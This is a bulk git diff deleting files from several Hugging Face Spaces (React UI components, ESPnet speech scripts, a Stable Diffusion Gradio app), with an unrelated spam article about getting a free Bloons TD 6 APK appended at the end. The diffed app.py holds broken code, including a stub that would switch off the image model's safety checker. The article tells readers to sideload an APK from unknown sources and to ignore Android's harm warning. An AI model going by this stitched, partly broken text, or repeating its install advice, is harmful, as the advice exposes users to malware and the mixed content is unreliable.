nn.init.normal_(self.positional_embeddings, mean=0, std=d_model ** -0.5) - - def forward(self, x): - seq_len, bs, d_model = x.shape - assert seq_len <= len(self.positional_embeddings), 'seq_len can be at most max_len.' - pos_emb = self.positional_embeddings[:seq_len] - return pos_emb.unsqueeze(1).expand(seq_len, bs, d_model) + x #* math.sqrt(x.shape[-1]) - - -class PairedScrambledPositionalEncodings(LearnedPositionalEncoding): - # TODO check whether it is a problem to use the same perm. for full batch - def forward(self, x): - seq_len, bs, d_model = x.shape - assert seq_len <= len(self.positional_embeddings), 'seq_len can be at most max_len.' - assert len(self.positional_embeddings) % 2 == 0, 'Please specify an even max_len.' 
- - paired_embs = self.positional_embeddings.view(len(self.positional_embeddings), -1, 2) - pos_emb = paired_embs[torch.randperm(len(paired_embs))].view(*self.positional_embeddings.shape)[:seq_len] - - return pos_emb.unsqueeze(1).expand(seq_len, bs, d_model) + x #* math.sqrt(x.shape[-1]) - - - - - - - - diff --git a/spaces/sdhsdhk/bingo111/src/components/ui/select.tsx b/spaces/sdhsdhk/bingo111/src/components/ui/select.tsx deleted file mode 100644 index 77f12c2996f541b97663de4c9e20ab34d4ec2fac..0000000000000000000000000000000000000000 --- a/spaces/sdhsdhk/bingo111/src/components/ui/select.tsx +++ /dev/null @@ -1,123 +0,0 @@ -'use client' - -import * as React from 'react' -import * as SelectPrimitive from '@radix-ui/react-select' - -import { cn } from '@/lib/utils' -import { - IconArrowDown, - IconCheck, - IconChevronUpDown -} from '@/components/ui/icons' - -const Select = SelectPrimitive.Root - -const SelectGroup = SelectPrimitive.Group - -const SelectValue = SelectPrimitive.Value - -const SelectTrigger = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, children, ...props }, ref) => ( - - {children} - - - - -)) -SelectTrigger.displayName = SelectPrimitive.Trigger.displayName - -const SelectContent = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, children, position = 'popper', ...props }, ref) => ( - - - - {children} - - - -)) -SelectContent.displayName = SelectPrimitive.Content.displayName - -const SelectLabel = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - -)) -SelectLabel.displayName = SelectPrimitive.Label.displayName - -const SelectItem = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, children, ...props }, ref) => ( - - - - - - - {children} - -)) -SelectItem.displayName = SelectPrimitive.Item.displayName - -const SelectSeparator = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - -)) -SelectSeparator.displayName = SelectPrimitive.Separator.displayName - -export { - Select, - SelectGroup, - SelectValue, - SelectTrigger, - SelectContent, - SelectLabel, - SelectItem, - SelectSeparator -} diff --git a/spaces/sdhsdhk/bingosjj/src/components/ui/codeblock.tsx b/spaces/sdhsdhk/bingosjj/src/components/ui/codeblock.tsx deleted file mode 100644 index aabda4e3b59f4e36b6ab79feb19d8d18b70e881b..0000000000000000000000000000000000000000 --- a/spaces/sdhsdhk/bingosjj/src/components/ui/codeblock.tsx +++ /dev/null @@ -1,142 +0,0 @@ -'use client' - -import { FC, memo } from 'react' -import { Prism as SyntaxHighlighter } from 'react-syntax-highlighter' -import { coldarkDark } from 'react-syntax-highlighter/dist/cjs/styles/prism' - -import { useCopyToClipboard } from '@/lib/hooks/use-copy-to-clipboard' -import { IconCheck, IconCopy, IconDownload } from '@/components/ui/icons' -import { Button } from '@/components/ui/button' - -interface Props { - language: string - value: string -} - -interface languageMap { - [key: string]: string | undefined -} - -export const programmingLanguages: languageMap = { - javascript: '.js', - python: '.py', - java: '.java', - c: '.c', - cpp: '.cpp', - 'c++': '.cpp', - 'c#': '.cs', - ruby: '.rb', - php: '.php', - swift: '.swift', - 'objective-c': '.m', - kotlin: '.kt', - typescript: '.ts', - go: '.go', - perl: '.pl', - rust: '.rs', - scala: '.scala', - haskell: '.hs', - lua: '.lua', - shell: '.sh', - sql: '.sql', - html: '.html', - 
css: '.css' - // add more file extensions here, make sure the key is same as language prop in CodeBlock.tsx component -} - -export const generateRandomString = (length: number, lowercase = false) => { - const chars = 'ABCDEFGHJKLMNPQRSTUVWXY3456789' // excluding similar looking characters like Z, 2, I, 1, O, 0 - let result = '' - for (let i = 0; i < length; i++) { - result += chars.charAt(Math.floor(Math.random() * chars.length)) - } - return lowercase ? result.toLowerCase() : result -} - -const CodeBlock: FC = memo(({ language, value }) => { - const { isCopied, copyToClipboard } = useCopyToClipboard({ timeout: 2000 }) - - const downloadAsFile = () => { - if (typeof window === 'undefined') { - return - } - const fileExtension = programmingLanguages[language] || '.file' - const suggestedFileName = `file-${generateRandomString( - 3, - true - )}${fileExtension}` - const fileName = window.prompt('Enter file name' || '', suggestedFileName) - - if (!fileName) { - // User pressed cancel on prompt. - return - } - - const blob = new Blob([value], { type: 'text/plain' }) - const url = URL.createObjectURL(blob) - const link = document.createElement('a') - link.download = fileName - link.href = url - link.style.display = 'none' - document.body.appendChild(link) - link.click() - document.body.removeChild(link) - URL.revokeObjectURL(url) - } - - const onCopy = () => { - if (isCopied) return - copyToClipboard(value) - } - - return ( -
      -
      - {language} -
      - - -
      -
      - - {value} - -
      - ) -}) -CodeBlock.displayName = 'CodeBlock' - -export { CodeBlock } diff --git a/spaces/segments-tobias/conex/espnet2/bin/enh_scoring.py b/spaces/segments-tobias/conex/espnet2/bin/enh_scoring.py deleted file mode 100644 index a64a42fdb07c5bc162749422ca969fa9029ebac4..0000000000000000000000000000000000000000 --- a/spaces/segments-tobias/conex/espnet2/bin/enh_scoring.py +++ /dev/null @@ -1,149 +0,0 @@ -#!/usr/bin/env python3 -import argparse -import logging -import sys -from typing import List -from typing import Union - -from mir_eval.separation import bss_eval_sources -import numpy as np -from pystoi import stoi -import torch -from typeguard import check_argument_types - -from espnet.utils.cli_utils import get_commandline_args -from espnet2.enh.espnet_model import ESPnetEnhancementModel -from espnet2.fileio.datadir_writer import DatadirWriter -from espnet2.fileio.sound_scp import SoundScpReader -from espnet2.utils import config_argparse - - -def scoring( - output_dir: str, - dtype: str, - log_level: Union[int, str], - key_file: str, - ref_scp: List[str], - inf_scp: List[str], - ref_channel: int, -): - assert check_argument_types() - - logging.basicConfig( - level=log_level, - format="%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s", - ) - - assert len(ref_scp) == len(inf_scp), ref_scp - num_spk = len(ref_scp) - - keys = [ - line.rstrip().split(maxsplit=1)[0] for line in open(key_file, encoding="utf-8") - ] - - ref_readers = [SoundScpReader(f, dtype=dtype, normalize=True) for f in ref_scp] - inf_readers = [SoundScpReader(f, dtype=dtype, normalize=True) for f in inf_scp] - - # get sample rate - sample_rate, _ = ref_readers[0][keys[0]] - - # check keys - for inf_reader, ref_reader in zip(inf_readers, ref_readers): - assert inf_reader.keys() == ref_reader.keys() - - with DatadirWriter(output_dir) as writer: - for key in keys: - ref_audios = [ref_reader[key][1] for ref_reader in ref_readers] - inf_audios = [inf_reader[key][1] for inf_reader in inf_readers] - ref = np.array(ref_audios) - inf = np.array(inf_audios) - if ref.ndim > inf.ndim: - # multi-channel reference and single-channel output - ref = ref[..., ref_channel] - assert ref.shape == inf.shape, (ref.shape, inf.shape) - elif ref.ndim < inf.ndim: - # single-channel reference and multi-channel output - raise ValueError( - "Reference must be multi-channel when the \ - network output is multi-channel." - ) - elif ref.ndim == inf.ndim == 3: - # multi-channel reference and output - ref = ref[..., ref_channel] - inf = inf[..., ref_channel] - - sdr, sir, sar, perm = bss_eval_sources(ref, inf, compute_permutation=True) - - for i in range(num_spk): - stoi_score = stoi(ref[i], inf[int(perm[i])], fs_sig=sample_rate) - si_snr_score = -float( - ESPnetEnhancementModel.si_snr_loss( - torch.from_numpy(ref[i][None, ...]), - torch.from_numpy(inf[int(perm[i])][None, ...]), - ) - ) - writer[f"STOI_spk{i + 1}"][key] = str(stoi_score) - writer[f"SI_SNR_spk{i + 1}"][key] = str(si_snr_score) - writer[f"SDR_spk{i + 1}"][key] = str(sdr[i]) - writer[f"SAR_spk{i + 1}"][key] = str(sar[i]) - writer[f"SIR_spk{i + 1}"][key] = str(sir[i]) - # save permutation assigned script file - writer[f"wav_spk{i + 1}"][key] = inf_readers[perm[i]].data[key] - - -def get_parser(): - parser = config_argparse.ArgumentParser( - description="Frontend inference", - formatter_class=argparse.ArgumentDefaultsHelpFormatter, - ) - - # Note(kamo): Use '_' instead of '-' as separator. - # '-' is confusing if written in yaml. 
- - parser.add_argument( - "--log_level", - type=lambda x: x.upper(), - default="INFO", - choices=("CRITICAL", "ERROR", "WARNING", "INFO", "DEBUG", "NOTSET"), - help="The verbose level of logging", - ) - - parser.add_argument("--output_dir", type=str, required=True) - - parser.add_argument( - "--dtype", - default="float32", - choices=["float16", "float32", "float64"], - help="Data type", - ) - - group = parser.add_argument_group("Input data related") - group.add_argument( - "--ref_scp", - type=str, - required=True, - action="append", - ) - group.add_argument( - "--inf_scp", - type=str, - required=True, - action="append", - ) - group.add_argument("--key_file", type=str) - group.add_argument("--ref_channel", type=int, default=0) - - return parser - - -def main(cmd=None): - print(get_commandline_args(), file=sys.stderr) - parser = get_parser() - args = parser.parse_args(cmd) - kwargs = vars(args) - kwargs.pop("config", None) - scoring(**kwargs) - - -if __name__ == "__main__": - main() diff --git a/spaces/segments-tobias/conex/espnet2/tts/variance_predictor.py b/spaces/segments-tobias/conex/espnet2/tts/variance_predictor.py deleted file mode 100644 index abc8f99cf30b3f3057e39bb61f16ab62867aa1ed..0000000000000000000000000000000000000000 --- a/spaces/segments-tobias/conex/espnet2/tts/variance_predictor.py +++ /dev/null @@ -1,88 +0,0 @@ -#!/usr/bin/env python3 - -# Copyright 2020 Tomoki Hayashi -# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0) - -"""Variance predictor related modules.""" - -import torch - -from typeguard import check_argument_types - -from espnet.nets.pytorch_backend.transformer.layer_norm import LayerNorm - - -class VariancePredictor(torch.nn.Module): - """Variance predictor module. - - This is a module of variacne predictor described in `FastSpeech 2: - Fast and High-Quality End-to-End Text to Speech`_. - - .. _`FastSpeech 2: Fast and High-Quality End-to-End Text to Speech`: - https://arxiv.org/abs/2006.04558 - - """ - - def __init__( - self, - idim: int, - n_layers: int = 2, - n_chans: int = 384, - kernel_size: int = 3, - bias: bool = True, - dropout_rate: float = 0.5, - ): - """Initilize duration predictor module. - - Args: - idim (int): Input dimension. - n_layers (int, optional): Number of convolutional layers. - n_chans (int, optional): Number of channels of convolutional layers. - kernel_size (int, optional): Kernel size of convolutional layers. - dropout_rate (float, optional): Dropout rate. - - """ - assert check_argument_types() - super().__init__() - self.conv = torch.nn.ModuleList() - for idx in range(n_layers): - in_chans = idim if idx == 0 else n_chans - self.conv += [ - torch.nn.Sequential( - torch.nn.Conv1d( - in_chans, - n_chans, - kernel_size, - stride=1, - padding=(kernel_size - 1) // 2, - bias=bias, - ), - torch.nn.ReLU(), - LayerNorm(n_chans, dim=1), - torch.nn.Dropout(dropout_rate), - ) - ] - self.linear = torch.nn.Linear(n_chans, 1) - - def forward(self, xs: torch.Tensor, x_masks: torch.Tensor = None) -> torch.Tensor: - """Calculate forward propagation. - - Args: - xs (Tensor): Batch of input sequences (B, Tmax, idim). - x_masks (ByteTensor, optional): - Batch of masks indicating padded part (B, Tmax). - - Returns: - Tensor: Batch of predicted sequences (B, Tmax, 1). 
- - """ - xs = xs.transpose(1, -1) # (B, idim, Tmax) - for f in self.conv: - xs = f(xs) # (B, C, Tmax) - - xs = self.linear(xs.transpose(1, 2)) # (B, Tmax, 1) - - if x_masks is not None: - xs = xs.masked_fill(x_masks, 0.0) - - return xs diff --git a/spaces/segments/panoptic-segment-anything/GroundingDINO/groundingdino/models/GroundingDINO/csrc/MsDeformAttn/ms_deform_attn_cpu.h b/spaces/segments/panoptic-segment-anything/GroundingDINO/groundingdino/models/GroundingDINO/csrc/MsDeformAttn/ms_deform_attn_cpu.h deleted file mode 100644 index b2b88e8c46f19b6db0933163e57ccdb51180f517..0000000000000000000000000000000000000000 --- a/spaces/segments/panoptic-segment-anything/GroundingDINO/groundingdino/models/GroundingDINO/csrc/MsDeformAttn/ms_deform_attn_cpu.h +++ /dev/null @@ -1,35 +0,0 @@ -/*! -************************************************************************************************** -* Deformable DETR -* Copyright (c) 2020 SenseTime. All Rights Reserved. -* Licensed under the Apache License, Version 2.0 [see LICENSE for details] -************************************************************************************************** -* Modified from https://github.com/chengdazhi/Deformable-Convolution-V2-PyTorch/tree/pytorch_1.0.0 -************************************************************************************************** -*/ - -#pragma once -#include - -namespace groundingdino { - -at::Tensor -ms_deform_attn_cpu_forward( - const at::Tensor &value, - const at::Tensor &spatial_shapes, - const at::Tensor &level_start_index, - const at::Tensor &sampling_loc, - const at::Tensor &attn_weight, - const int im2col_step); - -std::vector -ms_deform_attn_cpu_backward( - const at::Tensor &value, - const at::Tensor &spatial_shapes, - const at::Tensor &level_start_index, - const at::Tensor &sampling_loc, - const at::Tensor &attn_weight, - const at::Tensor &grad_output, - const int im2col_step); - -} // namespace groundingdino diff --git a/spaces/sharmaanupam/eigenvectors/__init__.py b/spaces/sharmaanupam/eigenvectors/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/shayakh/sdrv51/app.py b/spaces/shayakh/sdrv51/app.py deleted file mode 100644 index 40835b892d37cfb178e0fd882b0d832eaaf36dc9..0000000000000000000000000000000000000000 --- a/spaces/shayakh/sdrv51/app.py +++ /dev/null @@ -1,189 +0,0 @@ -from diffusers import StableDiffusionPipeline, StableDiffusionImg2ImgPipeline, DPMSolverMultistepScheduler -import gradio as gr -import torch -from PIL import Image - -model_id = 'SG161222/Realistic_Vision_V5.1_noVAE' -prefix = 'RAW photo,' - -scheduler = DPMSolverMultistepScheduler.from_pretrained(model_id, subfolder="scheduler") - -pipe = StableDiffusionPipeline.from_pretrained( - model_id, - torch_dtype=torch.float16 if torch.cuda.is_available() else torch.float32, - scheduler=scheduler) - -pipe_i2i = StableDiffusionImg2ImgPipeline.from_pretrained( - model_id, - torch_dtype=torch.float16 if torch.cuda.is_available() else torch.float32, - scheduler=scheduler) - -if torch.cuda.is_available(): - pipe = pipe.to("cuda") - pipe_i2i = pipe_i2i.to("cuda") - -def error_str(error, title="Error"): - return f"""#### {title} - {error}""" if error else "" - - -def _parse_args(prompt, generator): - parser = argparse.ArgumentParser( - description="making it work." 
- ) - parser.add_argument( - "--no-half-vae", help="no half vae" - ) - - cmdline_args = parser.parse_args() - command = cmdline_args.command - conf_file = cmdline_args.conf_file - conf_args = Arguments(conf_file) - opt = conf_args.readArguments() - - if cmdline_args.config_overrides: - for config_override in cmdline_args.config_overrides.split(";"): - config_override = config_override.strip() - if config_override: - var_val = config_override.split("=") - assert ( - len(var_val) == 2 - ), f"Config override '{var_val}' does not have the form 'VAR=val'" - conf_args.add_opt(opt, var_val[0], var_val[1], force_override=True) - -def inference(prompt, guidance, steps, width=512, height=512, seed=0, img=None, strength=0.5, neg_prompt="", auto_prefix=False): - generator = torch.Generator('cuda').manual_seed(seed) if seed != 0 else None - prompt = f"{prefix} {prompt}" if auto_prefix else prompt - - try: - if img is not None: - return img_to_img(prompt, neg_prompt, img, strength, guidance, steps, width, height, generator), None - else: - return txt_to_img(prompt, neg_prompt, guidance, steps, width, height, generator), None - except Exception as e: - return None, error_str(e) - - - -def txt_to_img(prompt, neg_prompt, guidance, steps, width, height, generator): - - result = pipe( - prompt, - negative_prompt = neg_prompt, - num_inference_steps = int(steps), - guidance_scale = guidance, - width = width, - height = height, - generator = generator) - - return result.images[0] - -def img_to_img(prompt, neg_prompt, img, strength, guidance, steps, width, height, generator): - - ratio = min(height / img.height, width / img.width) - img = img.resize((int(img.width * ratio), int(img.height * ratio)), Image.LANCZOS) - result = pipe_i2i( - prompt, - negative_prompt = neg_prompt, - init_image = img, - num_inference_steps = int(steps), - strength = strength, - guidance_scale = guidance, - width = width, - height = height, - generator = generator) - - return result.images[0] - - def fake_safety_checker(images, **kwargs): - return result.images[0], [False] * len(images) - - pipe.safety_checker = fake_safety_checker - -css = """.main-div div{display:inline-flex;align-items:center;gap:.8rem;font-size:1.75rem}.main-div div h1{font-weight:900;margin-bottom:7px}.main-div p{margin-bottom:10px;font-size:94%}a{text-decoration:underline}.tabs{margin-top:0;margin-bottom:0}#gallery{min-height:20rem} -""" -with gr.Blocks(css=css) as demo: - gr.HTML( - f""" -
      -
      -

      📷 Realistic Vision V5.1 📸

      -
      -

      - Demo for Realistic Vision V5.1 - Stable Diffusion model by Eugene. {"" if prefix else ""} - Running on {"GPU 🔥" if torch.cuda.is_available() else f"CPU ⚡"}. -

      -

      Please use the prompt template below to get an example of the desired generation results: -

      - -Prompt: -
      -* subject *, (high detailed skin:1.2), 8k uhd, dslr, soft lighting, high quality, film grain, Fujifilm XT3 -
      -
      - -Example: a close up portrait photo of 26 y.o woman in wastelander clothes, long haircut, pale skin, slim body, background is city ruins,
      -(high detailed skin:1.2), 8k uhd, dslr, soft lighting, high quality, film grain, Fujifilm XT3 -
      -
      - -
      -Negative Prompt: -
      -(deformed iris, deformed pupils, semi-realistic, cgi, 3d, render, sketch, cartoon, drawing, anime:1.4), text, close up, cropped, out of frame, worst quality,
      -low quality, jpeg artifacts, ugly, duplicate, morbid, mutilated, extra fingers, mutated hands, poorly drawn hands, poorly drawn face, mutation, deformed, blurry,
      -dehydrated, bad anatomy, bad proportions, extra limbs, cloned face, disfigured, gross proportions, malformed limbs, missing arms, missing legs, extra arms,
      -extra legs, fused fingers, too many fingers, long neck -
      - -
      -Have Fun & Enjoy ⚡ //THAFX -
      - -
      - """ - ) - with gr.Row(): - - with gr.Column(scale=55): - with gr.Group(): - with gr.Row(): - prompt = gr.Textbox(label="Prompt", show_label=False,max_lines=2,placeholder=f"{prefix} [your prompt]").style(container=False) - generate = gr.Button(value="Generate").style(rounded=(False, True, True, False)) - - image_out = gr.Image(height=512) - error_output = gr.Markdown() - - with gr.Column(scale=45): - with gr.Tab("Options"): - with gr.Group(): - neg_prompt = gr.Textbox(label="Negative prompt", placeholder="What to exclude from the image") - auto_prefix = gr.Checkbox(label="Prefix styling tokens automatically (RAW photo,)", value=prefix, visible=prefix) - - with gr.Row(): - guidance = gr.Slider(label="Guidance scale", value=5, maximum=15) - steps = gr.Slider(label="Steps", value=20, minimum=2, maximum=75, step=1) - - with gr.Row(): - width = gr.Slider(label="Width", value=512, minimum=64, maximum=1024, step=8) - height = gr.Slider(label="Height", value=512, minimum=64, maximum=1024, step=8) - - seed = gr.Slider(0, 2147483647, label='Seed (0 = random)', value=0, step=1) - - with gr.Tab("Image to image"): - with gr.Group(): - image = gr.Image(label="Image", height=256, tool="editor", type="pil") - strength = gr.Slider(label="Transformation strength", minimum=0, maximum=1, step=0.01, value=0.5) - - auto_prefix.change(lambda x: gr.update(placeholder=f"{prefix} [your prompt]" if x else "[Your prompt]"), inputs=auto_prefix, outputs=prompt, queue=False) - - inputs = [prompt, guidance, steps, width, height, seed, image, strength, neg_prompt, auto_prefix] - outputs = [image_out, error_output] - prompt.submit(inference, inputs=inputs, outputs=outputs) - generate.click(inference, inputs=inputs, outputs=outputs) - - - -demo.queue(concurrency_count=1) -demo.launch() diff --git a/spaces/shi-labs/OneFormer/oneformer/utils/pos_embed.py b/spaces/shi-labs/OneFormer/oneformer/utils/pos_embed.py deleted file mode 100644 index aa11d60db65fa98c140e7d75bdf985ff7ece8f18..0000000000000000000000000000000000000000 --- a/spaces/shi-labs/OneFormer/oneformer/utils/pos_embed.py +++ /dev/null @@ -1,122 +0,0 @@ -# -------------------------------------------------------- -# Position embedding utils -# -------------------------------------------------------- - -from typing import Tuple - -import numpy as np -import torch - - -# -------------------------------------------------------- -# 2D sine-cosine position embedding -# References: -# Transformer: https://github.com/tensorflow/models/blob/master/official/nlp/transformer/model_utils.py -# MoCo v3: https://github.com/facebookresearch/moco-v3 -# -------------------------------------------------------- -def get_2d_sincos_pos_embed(embed_dim, grid_size, cls_token=False): - """ - grid_size: int of the grid height and width - return: - pos_embed: [grid_size*grid_size, embed_dim] or [1+grid_size*grid_size, embed_dim] (w/ or w/o cls_token) - """ - grid_h = np.arange(grid_size, dtype=np.float32) - grid_w = np.arange(grid_size, dtype=np.float32) - grid = np.meshgrid(grid_w, grid_h) # here w goes first - grid = np.stack(grid, axis=0) - - grid = grid.reshape([2, 1, grid_size, grid_size]) - pos_embed = get_2d_sincos_pos_embed_from_grid(embed_dim, grid) - if cls_token: - pos_embed = np.concatenate([np.zeros([1, embed_dim]), pos_embed], axis=0) - return pos_embed - - -def get_2d_sincos_pos_embed_from_grid(embed_dim, grid): - assert embed_dim % 2 == 0 - - # use half of dimensions to encode grid_h - emb_h = get_1d_sincos_pos_embed_from_grid(embed_dim // 2, grid[0]) # (H*W, D/2) - 
emb_w = get_1d_sincos_pos_embed_from_grid(embed_dim // 2, grid[1]) # (H*W, D/2) - - emb = np.concatenate([emb_h, emb_w], axis=1) # (H*W, D) - return emb - - -def get_1d_sincos_pos_embed_from_grid(embed_dim, pos): - """ - embed_dim: output dimension for each position - pos: a list of positions to be encoded: size (M,) - out: (M, D) - """ - assert embed_dim % 2 == 0 - omega = np.arange(embed_dim // 2, dtype=np.float) - omega /= embed_dim / 2.0 - omega = 1.0 / 10000 ** omega # (D/2,) - - pos = pos.reshape(-1) # (M,) - out = np.einsum("m,d->md", pos, omega) # (M, D/2), outer product - - emb_sin = np.sin(out) # (M, D/2) - emb_cos = np.cos(out) # (M, D/2) - - emb = np.concatenate([emb_sin, emb_cos], axis=1) # (M, D) - return emb - - -# -------------------------------------------------------- -# Interpolate position embeddings for high-resolution -# References: -# DeiT: https://github.com/facebookresearch/deit -# -------------------------------------------------------- -def interpolate_pos_embed(model, checkpoint_model, pos_embed_key): - if pos_embed_key in checkpoint_model: - pos_embed_checkpoint = checkpoint_model[pos_embed_key] - embedding_size = pos_embed_checkpoint.shape[-1] - num_patches = model.num_patches - if pos_embed_key.startswith("decoder"): - num_extra_tokens = model.decoder_pos_embed.shape[-2] - num_patches - else: - num_extra_tokens = model.pos_embed.shape[-2] - num_patches - # height (== width) for the checkpoint position embedding - orig_size = int((pos_embed_checkpoint.shape[-2] - num_extra_tokens) ** 0.5) - # height (== width) for the new position embedding - new_size = int(num_patches ** 0.5) - # class_token and dist_token are kept unchanged - if orig_size != new_size: - print( - "Position interpolate from %dx%d to %dx%d" - % (orig_size, orig_size, new_size, new_size) - ) - extra_tokens = pos_embed_checkpoint[:, :num_extra_tokens] - # only the position tokens are interpolated - pos_tokens = pos_embed_checkpoint[:, num_extra_tokens:] - pos_tokens = pos_tokens.reshape( - -1, orig_size, orig_size, embedding_size - ).permute(0, 3, 1, 2) - pos_tokens = torch.nn.functional.interpolate( - pos_tokens, - size=(new_size, new_size), - mode="bicubic", - align_corners=False, - ) - pos_tokens = pos_tokens.permute(0, 2, 3, 1).flatten(1, 2) - new_pos_embed = torch.cat((extra_tokens, pos_tokens), dim=1) - checkpoint_model[pos_embed_key] = new_pos_embed - - -def interpolate_pos_embed_online( - pos_embed, orig_size: Tuple[int], new_size: Tuple[int], num_extra_tokens: int -): - extra_tokens = pos_embed[:, :num_extra_tokens] - pos_tokens = pos_embed[:, num_extra_tokens:] - embedding_size = pos_tokens.shape[-1] - pos_tokens = pos_tokens.reshape( - -1, orig_size[0], orig_size[1], embedding_size - ).permute(0, 3, 1, 2) - pos_tokens = torch.nn.functional.interpolate( - pos_tokens, size=new_size, mode="bicubic", align_corners=False, - ) - pos_tokens = pos_tokens.permute(0, 2, 3, 1).flatten(1, 2) - new_pos_embed = torch.cat((extra_tokens, pos_tokens), dim=1) - return new_pos_embed diff --git a/spaces/shivammehta25/Diff-TTSG/setup.py b/spaces/shivammehta25/Diff-TTSG/setup.py deleted file mode 100644 index ceb91ddb4ed53e05ae72ceb064545945fea2dd06..0000000000000000000000000000000000000000 --- a/spaces/shivammehta25/Diff-TTSG/setup.py +++ /dev/null @@ -1,37 +0,0 @@ -#!/usr/bin/env python -import os - -import numpy -import pkg_resources -from Cython.Build import cythonize -from setuptools import Extension, find_packages, setup - -exts = [ - Extension( - name="diff_ttsg.utils.monotonic_align.core", - 
sources=["diff_ttsg/utils/monotonic_align/core.pyx"], - ) -] - -setup( - name="diff_ttsg", - version="0.0.1", - description="Denoising probabilistic integrated speech and gesture synthesis", - author="Shivam Mehta", - author_email="shivam.mehta25@gmail.com", - url="https://shivammehta25.github.io/Diff-TTSG/", - install_requires=[ - str(r) - for r in pkg_resources.parse_requirements( - open(os.path.join(os.path.dirname(__file__), "requirements.txt")) - ) - ], - include_dirs=[numpy.get_include()], - packages=find_packages(exclude=["tests", "tests/*", "examples", "examples/*"]), - # use this to customize global commands available in the terminal after installing the package - entry_points={ - "console_scripts": [ - ] - }, - ext_modules=cythonize(exts, language_level=3), -) diff --git a/spaces/simonduerr/diffdock/esm/esm/inverse_folding/__init__.py b/spaces/simonduerr/diffdock/esm/esm/inverse_folding/__init__.py deleted file mode 100644 index 2906fc5a84b8c3cf64af778f8c78938d57d2f7da..0000000000000000000000000000000000000000 --- a/spaces/simonduerr/diffdock/esm/esm/inverse_folding/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from . import gvp_transformer -from . import util -from . import multichain_util diff --git a/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Download Bloons TD 6 APK No Mod and Join the Balloon Popping Adventure.md b/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Download Bloons TD 6 APK No Mod and Join the Balloon Popping Adventure.md deleted file mode 100644 index 14bdd5884839e5a25ad249025e532ba711588d18..0000000000000000000000000000000000000000 --- a/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Download Bloons TD 6 APK No Mod and Join the Balloon Popping Adventure.md +++ /dev/null @@ -1,94 +0,0 @@ -
      -

      Download Bloons TD 6 APK No Mod: A Guide for Android Users

      -

      If you are a fan of tower defense games, you might have heard of Bloons TD 6, the latest installment in the popular Bloons series. Developed and published by Ninja Kiwi, this game offers hours of fun and strategy with its colorful graphics, addictive gameplay, and diverse content. In this article, we will show you how to download Bloons TD 6 APK no mod for your Android device, and give you some tips and tricks to help you pop those pesky bloons.

      -

      Features of Bloons TD 6

      -

      Bloons TD 6 is a game that combines 3D graphics and line-of-sight mechanics with the classic tower defense formula. Your goal is to prevent enemy balloons, or bloons, from reaching the end of the path by placing monkey towers along the way. Each tower has its own strengths and weaknesses, and can be upgraded with different paths and abilities. Here are some of the features that make Bloons TD 6 stand out from other tower defense games:

      -

      download bloons td 6 apk no mod


      Download Ziphttps://ssurll.com/2uO0J4



      -
        -
      • 23 monkey towers with 3 upgrade paths and unique activated abilities. You can choose from dart monkeys, boomerang monkeys, sniper monkeys, ninja monkeys, bomb shooters, ice monkeys, glue gunners, super monkeys, helicopter pilots, alchemists, druids, banana farms, spike factories, monkey villages, mortar monkeys, engineer monkeys, dartling gunners, beast handlers, and more. Each tower has its own personality and style, and can be customized with different skins and voiceovers.
      • -
      • 14 heroes with 20 signature upgrades and 2 special abilities. Heroes are powerful units that level up automatically during the game. You can choose from Quincy the archer, Gwendolin the pyromaniac, Striker Jones the artillery commander, Obyn Greenfoot the forest guardian, Captain Churchill the tank driver, Benjamin the hacker, Ezili the voodoo monkey, Pat Fusty the giant ape, Adora the sun goddess, Brickell the naval commander, Etienne the drone operator, Sauda the sword master, Psi the psychic monkey, or Admiral Brickell Jr. the mini submarine. Each hero has its own backstory and voice lines.
      • -
      • 4-player co-op mode and online content browser. You can team up with up to three other players online and share your monkey money, lives, and powers. You can also create your own challenges and odysseys using the content browser, and share them with other players or play the most liked and played community content.
      • -
      • Regular updates, boss events, odysseys, quests, and more. The game is constantly updated with new features and content. You can participate in boss events where you face off against fearsome boss bloons with special abilities. You can also embark on odysseys where you play a series of maps with limited towers and upgrades. You can also complete daily and weekly quests to earn rewards and trophies.
      • -
      -

      Bloons TD 6 is a game that will keep you entertained and challenged for a long time. Whether you are a casual or hardcore player, you will find something to enjoy in this game.

      -

      How to Download Bloons TD 6 APK No Mod

      -

      If you want to play Bloons TD 6 on your Android device, you have two options. You can either buy the game from the Google Play Store for $4.99, or you can download the APK file for free from a third-party source. The APK file is a package that contains the game's installation files and data. However, downloading the APK file from an unknown source can be risky, as it may contain viruses or malware that can harm your device. Therefore, you should be careful when choosing where to download the APK file from. Here are the steps to download Bloons TD 6 APK no mod safely and easily:

      -
        -
      1. Find a reliable source for the APK file. You can search online for websites that offer Bloons TD 6 APK no mod downloads, but make sure to check the reviews and ratings of the site before downloading anything. You can also use a trusted APK downloader app, such as APKPure or APKMirror, to find and download the APK file. Alternatively, you can ask a friend who has the game to share the APK file with you via Bluetooth or email.
      2. -
      3. Enable unknown sources on your device. Before you can install the APK file, you need to allow your device to install apps from sources other than the Google Play Store. To do this, go to Settings > Security > Unknown Sources and toggle it on. You may also need to grant permission to the app or browser that you are using to download the APK file.
      4. -
      5. Download and install the APK file. Once you have found and verified the APK file, tap on it to start the download process. You may see a warning message that says "This type of file can harm your device". Ignore it and tap OK. After the download is complete, tap on the APK file again to start the installation process. Follow the instructions on the screen and wait for the installation to finish.
      6. -
      7. Launch the game and enjoy. After the installation is done, you can find the Bloons TD 6 icon on your home screen or app drawer. Tap on it to launch the game and start popping bloons. You may need to grant some permissions to the game, such as access to storage and network. You may also need to verify your age and accept the terms of service.
      8. -
      -

